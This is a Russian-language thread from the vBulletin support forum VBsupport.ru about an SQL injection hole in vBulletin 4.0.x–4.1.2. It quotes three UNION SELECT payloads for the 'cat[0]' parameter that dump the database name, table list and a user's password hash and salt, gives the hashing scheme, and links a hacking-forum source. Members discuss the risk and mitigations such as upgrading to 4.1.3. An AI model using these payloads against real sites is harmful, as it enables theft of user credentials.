VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
md5(md5($pass).$salt)
Говорят что работает на 4.0.x - 4.1.2, а в 4.1.3 - пропатчено.
Опасно ли это все ?
Кроме установки - 4.1.3 чемто можно обезапасится ?
Кроме установки - 4.1.3 чемто можно обезапасится ?
Найти что именно в этом плане исправлено в 4.1.3 и исправить у себя.
Luvilla
Гость
Posts: n/a
Quote:
Originally Posted by wandex
Опасно ли это все ?
интересный вопрос... у тебя на глазах 4ку поимели по полной схеме за неполные 9 минут, включая время на регистрацию, а ты спрашиваешь, опасно ли это?
Quote:
Originally Posted by wandex
Кроме установки - 4.1.3 чемто можно обезапасится ?
теоретически? - отключить соц.группы как класс, глобально (настройки - профиль пользователя)
практически - это не первая и не последняя фатальная дыра в 4ке, их будут находить ещё пачками, поэтому единственно правильное решение - оставаться на тройке.
Всегда были выключены изначально. Непонятно все таки, есть опасность или нет.
PS - если кому интересно, инфа отсюда - hackforums.net/showthread.php?tid=1305290 регит там быстрои сразу + у них еще пару смежных топиков по взлому четверки.